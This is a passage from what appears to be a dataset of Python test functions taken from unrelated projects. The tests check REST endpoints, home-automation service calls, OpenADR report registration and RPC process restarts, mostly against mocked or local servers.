content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_start_several_values(self):\n for ip in [\"1.1.1.1\", \"2.2.2.2\", \"3.3.3.3\"]:\n self.client.ensure_path(\"/services/db/%s\" % ip)\n self.client.set(\"/services/db/%s\" % ip,\n json.dumps({\"enabled\": \"1\",\n \"ip\": ip}))\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf)\n z.loop(2, timeout=self.TIMEOUT)\n self.conf.write.assert_called_with({\"1.1.1.1\": {\"enabled\": \"1\", \"ip\": \"1.1.1.1\"},\n \"2.2.2.2\": {\"enabled\": \"1\", \"ip\": \"2.2.2.2\"},\n \"3.3.3.3\": {\"enabled\": \"1\", \"ip\": 
\"3.3.3.3\"}})", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "async def test_program_start_and_stop(\n aresponses: ResponsesMockServer,\n authenticated_local_client: ResponsesMockServer,\n program_start_stop_response: dict[str, Any],\n) -> None:\n async with authenticated_local_client:\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/start\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/stop\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n\n async with aiohttp.ClientSession() as session:\n client = Client(session=session)\n await client.load_local(\n TEST_HOST, TEST_PASSWORD, port=TEST_PORT, use_ssl=False\n )\n controller = next(iter(client.controllers.values()))\n\n data = await controller.programs.start(1)\n assert data[\"message\"] == \"OK\"\n\n data = await controller.programs.stop(1)\n assert data[\"message\"] == \"OK\"\n\n aresponses.assert_plan_strictly_followed()", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n 
f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_gwservice_updatedevice(self, setup_controller):\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n payload = {'serialNumber': 'DEADBEEF0011',\n 'owner': 'pytest'}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"PUT\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"GET\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create device verify\", body=body)\n if resp.status_code != 200:\n assert False\n\n device = json.loads(resp.text)\n print (device)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n @pytest.mark.sdk_restapi\n def test_gwservice_deletedevice(self, setup_controller):\n \"\"\"\n Test the delete device endpoint\n WIFI-3455\n \"\"\"\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False", "def test_multiple_segments(self):\n socket = Mock()\n data = service_call.encode_call('bar', [10])\n socket.recv = Mock()\n socket.recv.side_effect = [data[:3], data[3:]]\n\n service_call.handle_connection(self.handlers, socket)\n self.handlers['bar'].assert_any_call([10])", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = 
reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n\n config_filename = 'testsuite_cfg.json'\n args.config = config_filename\n config_file = open(config_filename, 'w')\n config_file.write(str(json.dumps(config)))\n config_file.close()\n\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app1', 'epg1')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app2', 'epg2')\n mac3 = '00:11:22:33:33:36'\n ip3 = '3.4.3.7'\n self.add_endpoint(mac3, ip3, 'intersite-testsuite', 'app2', 'epg2')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app1-epg1'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))\n self.assertTrue(self.verify_remote_site_has_entry(mac3, ip3, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app2-epg2'))", "def test_basic_add_multiple_endpoint(self):\n mac1, ip1 = self.setup_with_endpoint()\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg2')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg1'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg2'))", "def test_basic_add_multiple_endpoint(self):\n mac1, ip1 = self.setup_with_endpoint()\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry(mac1, ip1, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app-epg'))\n self.assertTrue(self.verify_remote_site_has_entry(mac2, ip2, 'intersite-testsuite',\n 'l3out', 'intersite-testsuite-app-epg'))", "async def test_report_registration_full():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report_full)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b')\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='PowerReport',\n resource_id='Device001',\n measurement='power_real',\n unit='W')\n client.add_report(callback=collect_data,\n report_specifier_id='PowerReport',\n resource_id='Device002',\n measurement='power_real',\n unit='W')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n\n\n await server.run_async()\n # await asyncio.sleep(0.1)\n # Register the client\n await 
client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 2\n assert len(server.services['report_service'].report_callbacks) == 4\n await client.stop()\n await server.stop()", "async def test_report_registration():\n # Create a server\n logger = logging.getLogger('openleadr')\n logger.setLevel(logging.DEBUG)\n server = OpenADRServer(vtn_id='testvtn')\n server.add_handler('on_register_report', on_register_report)\n server.add_handler('on_create_party_registration', on_create_party_registration)\n\n # Create a client\n client = OpenADRClient(ven_name='myven', vtn_url='http://localhost:8080/OpenADR2/Simple/2.0b',)\n\n # Add 4 reports\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device001',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='CurrentReport',\n resource_id='Device002',\n measurement='current',\n unit='A')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device001',\n measurement='voltage',\n unit='V')\n client.add_report(callback=collect_data,\n report_specifier_id='VoltageReport',\n resource_id='Device002',\n measurement='voltage',\n unit='V')\n\n asyncio.create_task(server.run_async())\n #await asyncio.sleep(1)\n # Register the client\n await client.create_party_registration()\n\n # Register the reports\n await client.register_reports(client.reports)\n assert len(client.report_requests) == 2\n assert len(server.services['report_service'].report_callbacks) == 4\n await client.stop()\n await server.stop()", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file_before()\n self.write_config_file(config, args)\n collector = execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry_before(mac1, ip1))\n self.assertTrue(self.verify_remote_site_has_entry_before(mac2, ip2))\n\n config = self.create_config_file_after()\n self.write_config_file(config, args)\n collector.reload_config()\n time.sleep(2)\n self.assertTrue(self.verify_remote_site_has_entry_after(mac1, ip1))\n self.assertTrue(self.verify_remote_site_has_entry_after(mac2, ip2))", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = 
models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "async def test_service_calls(oppio_env, opp, aioclient_mock):\n assert await async_setup_component(opp, \"oppio\", {})\n\n aioclient_mock.post(\"http://127.0.0.1/addons/test/start\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stop\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/restart\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/update\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stdin\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/shutdown\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/reboot\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/full\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/partial\", json={\"result\": \"ok\"})\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/full\", json={\"result\": \"ok\"}\n )\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/partial\", json={\"result\": \"ok\"}\n )\n\n await opp.services.async_call(\"oppio\", \"addon_start\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_stop\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_restart\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_update\", {\"addon\": \"test\"})\n await opp.services.async_call(\n \"oppio\", \"addon_stdin\", {\"addon\": \"test\", \"input\": \"test\"}\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 8\n assert aioclient_mock.mock_calls[-1][2] == \"test\"\n\n await opp.services.async_call(\"oppio\", \"host_shutdown\", {})\n await opp.services.async_call(\"oppio\", \"host_reboot\", {})\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 10\n\n await opp.services.async_call(\"oppio\", \"snapshot_full\", {})\n await opp.services.async_call(\n \"oppio\",\n \"snapshot_partial\",\n {\"addons\": [\"test\"], \"folders\": [\"ssl\"], \"password\": \"123456\"},\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 12\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n }\n\n await opp.services.async_call(\"oppio\", \"restore_full\", {\"snapshot\": \"test\"})\n await opp.services.async_call(\n \"oppio\",\n \"restore_partial\",\n {\n \"snapshot\": \"test\",\n \"openpeerpower\": False,\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n },\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 14\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"openpeerpower\": False,\n \"password\": \"123456\",\n }", "def test_get_next_to_arrive(self, mock_requests):\n\n r = services.get_next_to_arrive(self.a, self.b)\n params = {'req1': self.a, 'req2': self.b}\n\n self.assertTrue(\n mock.call.get(services.SEPTA_NEXTTOARRIVE_URL, params=params) in\n mock_requests.mock_calls)", "def test_API(self):\n print(\"Test API ...\")\n t0 = time.time()\n c = 0\n for trip_headsign in TRIP_HEADSIGN:\n for stop in STOP_A:\n payload 
= {'format': 'json', 'route_id': \"A\", 'trip_headsign': trip_headsign, 'stop_name': stop}\n req = requests.get('https://applications002.brest-metropole.fr/WIPOD01/Transport/REST/getRemainingTimes',params=payload)\n if len(req.text) < 100 : #API answer 189 characters if it works well\n print(\"API not responding for parameters : {}, {} \".format(trip_headsign, stop))\n c += 1\n else :\n print(\"Params : {}, {} : {}\".format(trip_headsign, stop, req.text))\n duration = time.time() - t0\n print(\"END OF TEST : duration : {} s, {} requests failed\".format(duration, c))", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # first call to this function tells that job is still in progress\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got 
called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test_basic_add_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n self.write_config_file(config, args)\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))", "def testApi(self):", "async def test_action(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_stop\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"stop\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover\")\n stop_calls = async_mock_service(hass, \"cover\", \"stop_cover\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}\n assert stop_calls[0].domain == DOMAIN\n assert stop_calls[0].service == \"stop_cover\"\n assert stop_calls[0].data == {\"entity_id\": entry.entity_id}", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, 
end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_simple_request(self):\n urls = [\"https://api.omniture.com/admin/1.4/rest/\",\n \"https://api2.omniture.com/admin/1.4/rest/\",\n \"https://api3.omniture.com/admin/1.4/rest/\",\n \"https://api4.omniture.com/admin/1.4/rest/\",\n \"https://api5.omniture.com/admin/1.4/rest/\"]\n self.assertIn(self.analytics.request('Company', 'GetEndpoint'),urls, \"Company.GetEndpoint failed\" )", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n 
self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n 